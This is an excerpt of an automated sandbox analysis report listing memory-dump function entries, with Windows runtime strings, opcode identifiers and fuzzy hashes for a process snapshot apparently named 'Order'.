                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019C063D
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                • Opcode ID: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
                                                                • Instruction ID: a69bdf3bf4ebe901e99f8e134e154f6962f112c4375989075dfe8b4536dc7344
                                                                • Opcode Fuzzy Hash: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
                                                                • Instruction Fuzzy Hash: B151CD79500742CBD724DF39C6446A7BBE8AF84B05F18493EE6DE87241E7309545CF92
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 019CA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 019CA309
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                • Opcode ID: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
                                                                • Instruction ID: bba06430f9a564b38d48f745625aef9221cc2bf79c5617ce9089c9e7d9c3563f
                                                                • Opcode Fuzzy Hash: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
                                                                • Instruction Fuzzy Hash: 6741D371A04659DFEB15CF6DC450B6E7BB4FF84B00F14446AE948DB291E3B5DA00CB52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                • Opcode ID: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
                                                                • Instruction ID: 1ce839a684051291af2588d3a78e53b946f3aa42daf3ca285db329796b54b820
                                                                • Opcode Fuzzy Hash: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
                                                                • Instruction Fuzzy Hash: 9401F4B2250744AFE312DF24CD45F1677E8E784715F01893EA64CC71A0E334D804CB46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                • Opcode ID: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
                                                                • Instruction ID: eda3f742bc1aef309efddea62688ce08ed8da351f77427027973d8296bf6a68c
                                                                • Opcode Fuzzy Hash: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
                                                                • Instruction Fuzzy Hash: 9E825D75E002198BEB25CFA9C880BEDBBB5BF48B10F14816DD99DAB291D7309941CF52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
                                                                • Instruction ID: c2ce1b4653ff727752f9812f2fcedb10c36501c2ae02cd8e90b005e017466b99
                                                                • Opcode Fuzzy Hash: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
                                                                • Instruction Fuzzy Hash: 6E918371940219AFEB21DFA5CD85FAEBBB8EF95750F104015F608BB190D775AD00CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
                                                                • Instruction ID: 329763fb91f62ed2d03e1b8056fc7f63a4ca29f133bd8d6f082359a944cd3bf4
                                                                • Opcode Fuzzy Hash: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
                                                                • Instruction Fuzzy Hash: 8391AD76A00649BEDF22EBA5DC44FAFBBBEEF85740F140029F604A7250DB349905CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                • Opcode ID: 2940a643d7b0d40eb3e4669faa2cd54150efcae8e374d1fc5247610c48dba721
                                                                • Instruction ID: 2fe5c63ef15f7663afb4bdd32e22ef3f88abcb89dc102d45bf27f29cd817dcec
                                                                • Opcode Fuzzy Hash: 2940a643d7b0d40eb3e4669faa2cd54150efcae8e374d1fc5247610c48dba721
                                                                • Instruction Fuzzy Hash: 2F715EB5E0020AAFDF2ACF9DD5907ADBBB1BF88710F14812EF509A7245E7719A41CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .mui
                                                                • API String ID: 0-1199573805
                                                                • Opcode ID: 38a92f56e2d4a32b898901316c2458014286971a7d7d5da650d261f6700c89cb
                                                                • Instruction ID: c748e302a0cc15eac304f3986814d8b246a465047ad6602811532346b2f52d8a
                                                                • Opcode Fuzzy Hash: 38a92f56e2d4a32b898901316c2458014286971a7d7d5da650d261f6700c89cb
                                                                • Instruction Fuzzy Hash: 2851B772D0022AEBDF15DF99D840AAEBBB9FF58B14F054129EA15BB240D7349D01CBE4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                • Opcode ID: 08c6d515bcb0930743b07dcc08c8b0638665510d33f222cd980493db1111b065
                                                                • Instruction ID: e9d6b79b701d696cce902bd4c61ede6f6bcef5af7dd026761fca42f5ca51c496
                                                                • Opcode Fuzzy Hash: 08c6d515bcb0930743b07dcc08c8b0638665510d33f222cd980493db1111b065
                                                                • Instruction Fuzzy Hash: CC419072508312ABD711DE79C980B6BB7ECAFC8B14F45892DFA8CDB180E674D904C796
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: cf0200b7a00a3f26351b902480ea1f0be4bb2e0c55f770f1ba4792217d9ce8c4
                                                                • Instruction ID: 0ea30e4ced1b1879d988e0f06e470eaa88cf7966f27cb3daa7bfdbe22bc72725
                                                                • Opcode Fuzzy Hash: cf0200b7a00a3f26351b902480ea1f0be4bb2e0c55f770f1ba4792217d9ce8c4
                                                                • Instruction Fuzzy Hash: 574154B1D0022DABDB21DB50DD84FDEB77CAB44724F0045A6BB08B7145DB709E898FA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                • Opcode ID: e463553afb18d2cfb8b9957695ae280b6fcd5d86d5916d20a02594157b98e009
                                                                • Instruction ID: 9d35b4135a65e3c413f8280d6cc9fa4ecdccd45491c55d7aa3552b25a361339b
                                                                • Opcode Fuzzy Hash: e463553afb18d2cfb8b9957695ae280b6fcd5d86d5916d20a02594157b98e009
                                                                • Instruction Fuzzy Hash: 14313931E047499BEB22DF69C850BFE7BB8EF54705F944028EE48AB282C775D805CB50
                                                                Strings
                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A4895E
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                • API String ID: 0-702105204
                                                                • Opcode ID: a94d76a0268f2fd4ac7e3f9698c23c759da09892352b53fcfba187ce7dd9f7cd
                                                                • Instruction ID: 21c1f8f9057e49841ce78f1b78c9eb7bd69304d22b4bb0bd76b721dd8dd76040
                                                                • Opcode Fuzzy Hash: a94d76a0268f2fd4ac7e3f9698c23c759da09892352b53fcfba187ce7dd9f7cd
                                                                • Instruction Fuzzy Hash: 9901473A200A81AFE6256F99E8C4A577F69EFC5654F08001CF64143153CB746841C793
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 504303fbb81be4342f2889e07d5c8277103852a35bcde35f165f574b5f4dc8d5
                                                                • Instruction ID: 4844363f1323e3fc57afe176339367d743ccada8e91dd8d0bc2a7c00f017967f
                                                                • Opcode Fuzzy Hash: 504303fbb81be4342f2889e07d5c8277103852a35bcde35f165f574b5f4dc8d5
                                                                • Instruction Fuzzy Hash: E142D4356083419BE726CF68C890B6BBBE9FFC8300F08492EFA9697250D775D845CB52
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77fd705fec481fed6e0682d856125e7cb80c0fca1d7a0af49b16bfe3fc2beef5
                                                                • Instruction ID: e3f0e1ce563c0daa36340aa59347c248691ab8e6ce5ff5f3862f03080b6fe36e
                                                                • Opcode Fuzzy Hash: 77fd705fec481fed6e0682d856125e7cb80c0fca1d7a0af49b16bfe3fc2beef5
                                                                • Instruction Fuzzy Hash: 7B426F75E042199FEB65CF69C841BADBBF5FF88310F188099E949EB242D7389981CF50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9847916399875665e24df9c008437e4a07e13b9de6fc426d934d35767c54bd53
                                                                • Instruction ID: c72292089a02d81c18c85e3a3b27f7aea075298424caad1f39418c41a424ae55
                                                                • Opcode Fuzzy Hash: 9847916399875665e24df9c008437e4a07e13b9de6fc426d934d35767c54bd53
                                                                • Instruction Fuzzy Hash: 8B32D070A017658BEB25CF6DC9447BEBBF2BF84304F14811DD98E9B285D775A802CB50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e59ff9f984b71b5bbbffd3528408d607b1e582cee279e842ee23c2c1c2fc55dc
                                                                • Instruction ID: 6dd8bcb8a39b94f8489bc0527107da9f9c336b8489a91a65f9076a1d851d4cd7
                                                                • Opcode Fuzzy Hash: e59ff9f984b71b5bbbffd3528408d607b1e582cee279e842ee23c2c1c2fc55dc
                                                                • Instruction Fuzzy Hash: F722D2742046618BEB25CF2DC494372BBF9BF45300F08845ADA97EF286D739E852DB60
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed1e866738396dde76b783eae5d8333387847934924941719f5cb95574e02d0a
                                                                • Instruction ID: 4c8853dcfb42837e3914c2f6908e5b22dd858974cc4a253ce7e36b0a5df95cd9
                                                                • Opcode Fuzzy Hash: ed1e866738396dde76b783eae5d8333387847934924941719f5cb95574e02d0a
                                                                • Instruction Fuzzy Hash: 8E328A71A04215CFDB25CF6CC580AAABBF5FF48700F14856EE999AB392D734E841CB91
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction ID: 431c04eca15620ad886390ddfefb8a3892e83a4e0791b9784e3ec146f663237f
                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction Fuzzy Hash: 8FF16271E0021A9FDF16CF99C584BAEBBF5AF48714F098129E909EB341E774E841CB60
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1ebf6f9ed2fe7571a3b228cd3f401dc30635bec96930215f1868b8d4e875770
                                                                • Instruction ID: 0bfb830978cf1a229a17e3a7d6ad5fef3b18f7311949adc1044b02afde59ef7e
                                                                • Opcode Fuzzy Hash: f1ebf6f9ed2fe7571a3b228cd3f401dc30635bec96930215f1868b8d4e875770
                                                                • Instruction Fuzzy Hash: 16D12072E0860A8BDF45CF6AC841AFEB7F5AF88304F198129D955E7241E73DE905CB60
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ecf190c0aa3711fc312cf1c43197e4c0cd4d81e2ebbb5066780adfd82109e2ea
                                                                • Instruction ID: c532566fc3a434e0e4f548ad4abbdf088cc1e2d4a8f30ed3ec74eb5ecada5a41
                                                                • Opcode Fuzzy Hash: ecf190c0aa3711fc312cf1c43197e4c0cd4d81e2ebbb5066780adfd82109e2ea
                                                                • Instruction Fuzzy Hash: 8AE18A71608342CFC715CF28C190A6ABBF4FF89714F158A6DE99987351EB31E905CB92
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f48a109af2429618d1ec0a08da976dabc6abc07006d142d02f0ac7c252992ba7
                                                                • Instruction ID: 6689197ea8e0b7be964d5004e92cfdb8a1e183dc87e91b0490899f3abef3b2dc
                                                                • Opcode Fuzzy Hash: f48a109af2429618d1ec0a08da976dabc6abc07006d142d02f0ac7c252992ba7
                                                                • Instruction Fuzzy Hash: 95D1D571A00206DBDB14DF69C9C0EFA77B9BF98714F04492DE92ADB284E734D951CB60
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction ID: 71ec00295dcebc949464e42d628ab8e63218dc9811bf6ed3e20a1e9834ae24f1
                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction Fuzzy Hash: 6DB17174A00705AFDB64DFD9D940EABBBB9FFC4304F14446EAA12A7794DA38E905CB10
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction ID: 13338309095568538e6e9967ef6b437a5ba26fc6a447b0cd61a7c74f4c0cc9ed
                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction Fuzzy Hash: AAB11731604656AFDB11DBACC840FBEBBF6BF88300F188559E65ADB281D730EA41CB50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1be4be042c5c8e7d7dcdf4d40caa05ee3ac66226b49d68bc6c2600fc4236bb4
                                                                • Instruction ID: 04915aee6204fee516a10d8725849470c2bf2104ec6f8b8854fac86e548dce04
                                                                • Opcode Fuzzy Hash: e1be4be042c5c8e7d7dcdf4d40caa05ee3ac66226b49d68bc6c2600fc4236bb4
                                                                • Instruction Fuzzy Hash: 16C14874208381CFD764CF19C484BABB7E9BF98704F44496EE98987291D7B4E948CF92
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5de737f5cfc2948e7a633fc14af5bc7688bcffc82c10153aeb75b1495e4d0248
                                                                • Instruction ID: 41fac92d730aa2e59536d45fca5d790b30dbbde6dd466865c7db89037737473c
                                                                • Opcode Fuzzy Hash: 5de737f5cfc2948e7a633fc14af5bc7688bcffc82c10153aeb75b1495e4d0248
                                                                • Instruction Fuzzy Hash: C3B18370A042668BDB25CF58C980BE9B3F5EF84710F0485EAD54EE7281EB70DD85CB21
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84c70803df3baffd628d07372195c16b2981ffed83bc338e3954ff861adde694
                                                                • Instruction ID: ed35095b85f398de73cba8395c3c2869f8bc023bded404daca2cf2e2530c2818
                                                                • Opcode Fuzzy Hash: 84c70803df3baffd628d07372195c16b2981ffed83bc338e3954ff861adde694
                                                                • Instruction Fuzzy Hash: 16A10571E006699FEB22DB5CC948FAEBBF4BB44B14F050125EA04AB2D1D7749D41CBD1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70f8d1f25cbebd9c88f58a563fcbd6e724289c564d8c85bbac35c658ef98def5
                                                                • Instruction ID: 27d69b4e4a88ea8f1daa9a107a813a1663277a6591f6581ec8eb5a1b7ef0bf18
                                                                • Opcode Fuzzy Hash: 70f8d1f25cbebd9c88f58a563fcbd6e724289c564d8c85bbac35c658ef98def5
                                                                • Instruction Fuzzy Hash: BFA1F270B017169FDB26CF69EA90BAAB7B1FF94354F044029FA06972C2DB74E815CB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84c83a03297669b4c8ddde364ab9539c6c4f6f99f38aef57dd002b8dbcb616c9
                                                                • Instruction ID: 2196af0d2bbee850024a66ad2106f4a2481ab6034ff233abb3b69c3f833d1f56
                                                                • Opcode Fuzzy Hash: 84c83a03297669b4c8ddde364ab9539c6c4f6f99f38aef57dd002b8dbcb616c9
                                                                • Instruction Fuzzy Hash: 31A1F172A14652EFDB12DF28CA80B1ABBE9FF88704F05452CF5499B651D334ED82CB91
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                • Instruction ID: ded6365bff730efa821eeb2ce180f6174dd2df8383f6b797e42bbf96fc4ba7bc
                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                • Instruction Fuzzy Hash: F3B12AB1E0061AEFDF15CFA9C880BADBBF5BF48310F14816AE914A7355D730A985CB90
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6fd2532881baa44d83d5ce944877657baca1fae611099c2a6235572713876b07
                                                                • Instruction ID: 38fab476df32a469295b9d8bf95c2736223dcb8b87a7b3479e76591b37fd7ddd
                                                                • Opcode Fuzzy Hash: 6fd2532881baa44d83d5ce944877657baca1fae611099c2a6235572713876b07
                                                                • Instruction Fuzzy Hash: DF91A371E00216AFDF15CFA8D884BBEBFB5AF89710F154169E618EB351D734E9009BA0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 175771a1f6db862da9ee38fdc4675aa8915ec2e641b4a0d053c12b8b0d46411f
                                                                • Instruction ID: 3517486aa64b37b1e8f579f626bae04f76c460d0a1afa4b6a3bc5071485abd59
                                                                • Opcode Fuzzy Hash: 175771a1f6db862da9ee38fdc4675aa8915ec2e641b4a0d053c12b8b0d46411f
                                                                • Instruction Fuzzy Hash: 78914532A00626CBEB25DB6CC480BBA7BA5EF94B58F05C469E90DDF291E634D901C791
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53d9abbdc741f7cc8d8e5699976f347db22848f541dfdd47c3d7451ca84de494
                                                                • Instruction ID: f6eb717c2aaf009a0222362ae8a69e994fb1dbc9e0f3fb08a05dc47eec94bc7e
                                                                • Opcode Fuzzy Hash: 53d9abbdc741f7cc8d8e5699976f347db22848f541dfdd47c3d7451ca84de494
                                                                • Instruction Fuzzy Hash: A0819371E0061A9BDB14CF69D940ABEBBF9FF48700F04852EE949E7644E374D941CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                • Instruction ID: 5727fd973f53f5d67810d25e6ffe7f4ae662e16dd3bc504475cf703e518f2bf4
                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                • Instruction Fuzzy Hash: CE818071A002099FDF19DF99C980ABEBBF2FF84310F18856AD9169B344DB74E906CB50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2625903632a2e51c06964d4ee780434099093c3bd28c1a79245191d4c0351a82
                                                                • Instruction ID: f9ee5164adac69ea4b9001ab8c6ad6e74c1301b017fdb3bdfc6ff86e80aa8a18
                                                                • Opcode Fuzzy Hash: 2625903632a2e51c06964d4ee780434099093c3bd28c1a79245191d4c0351a82
                                                                • Instruction Fuzzy Hash: 87819271900609AFDB25CFA9C880BEEBBF9FF88354F11442DE659A7260D770AC45CB60
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ebe0ac76851315f5500062a0b6dc7d09af3548ef79e6104597bb805c1bb05a4
                                                                • Instruction ID: 9f405c87f95f024ce7e149a1d4043f782c0b693f94a9431125ca0aa5c7d8550e
                                                                • Opcode Fuzzy Hash: 0ebe0ac76851315f5500062a0b6dc7d09af3548ef79e6104597bb805c1bb05a4
                                                                • Instruction Fuzzy Hash: 6A71EEB5D01265DBCB258F58C890BBEBBF0FF58710F15851EE946AB351D738A805CBA0
                                                                Memory Dump Source
